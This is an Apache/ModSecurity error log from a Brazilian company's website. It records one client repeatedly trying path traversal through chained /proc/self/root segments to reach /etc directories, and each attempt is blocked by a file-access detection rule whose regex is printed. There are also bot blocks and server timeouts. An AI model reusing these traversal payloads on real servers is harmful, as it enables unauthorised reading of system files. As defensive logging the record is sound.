[Wed Mar 18 16:49:23.090572 2026] [mime_magic:error] [pid 15826:tid 140411699963648] (70014)End of file found: [client 57.141.18.111:39366] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:49:43.129779 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38754] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:49:50.047518 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:44058] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB3gbLMZ6AikZjR9X9HgAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:49:50.720993 2026] [mime_magic:error] [pid 15826:tid 140411616036608] (70014)End of file found: [client 57.141.18.89:39870] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:49:52.621359 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.241.31:46056] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB4AkwaGbbGflqUZBPDAAAANQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:49:55.292484 2026] [:error] [pid 9800:tid 140411716749056] [client 74.7.241.31:46072] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB44JpNEVVDhwB8vOB_QAAA4M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:49:58.146895 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:54170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB5uw_le52K8_3pV0YSwAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:00.363222 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.241.31:54182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB6Na6ubjKNq_cu4baPAAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:04.047792 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.241.31:54188] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB7EzinOy1jxa1j4daIgAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:05.977127 2026] [:error] [pid 9800:tid 140411708356352] [client 74.7.241.31:54192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB7YJpNEVVDhwB8vOB_gAAA4Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:07.380997 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:49680] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB70zinOy1jxa1j4daJAAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:09.058050 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:39274] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:50:12.593809 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:49694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB9AbLMZ6AikZjR9X9JgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:13.223546 2026] [:error] [pid 14269:tid 140411624429312] [client 74.7.241.31:49694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB9QbLMZ6AikZjR9X9JwAAAA4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:14.999135 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:49710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB9gkwaGbbGflqUZBPDgAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:16.636811 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.241.31:49712] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB-Mdf6f5d65gmYZQSrgAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:22.795956 2026] [:error] [pid 9530:tid 140411574073088] [client 74.7.241.31:36470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absB_gSuyh5UNeevTVfg5AAAAxQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:26.965956 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:36484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCAgkwaGbbGflqUZBPIQAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:29.422207 2026] [mime_magic:error] [pid 17887:tid 140411666392832] (70014)End of file found: [client 57.141.18.44:40752] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 16:50:35.133830 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:39826] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:50:38.691442 2026] [:error] [pid 9800:tid 140411674785536] [client 74.7.244.43:41994] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absCDoJpNEVVDhwB8vOCCwAAA4g"]
[Wed Mar 18 16:50:47.839670 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.241.31:43284] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCF0zinOy1jxa1j4daNQAAAQw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:50:54.184051 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.228.61:43880] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "absCHta6ubjKNq_cu4baRAAAA0k"]
[Wed Mar 18 16:50:55.374297 2026] [core:alert] [pid 27403:tid 140411674785536] [client 57.141.18.6:41278] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Wed Mar 18 16:50:59.418600 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:43986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCI-oXxyEfFpUF8f-yVQAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:51:08.083677 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:41484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCLOw_le52K8_3pV0YdAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:51:13.133790 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40550] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:51:16.850577 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:41490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCNOoXxyEfFpUF8f-yZAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 16:51:46.137828 2026] [proxy_fcgi:error] [pid 9530:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41154] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 16:51:59.323398 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:41490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "absCX-oXxyEfFpUF8f-yegAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
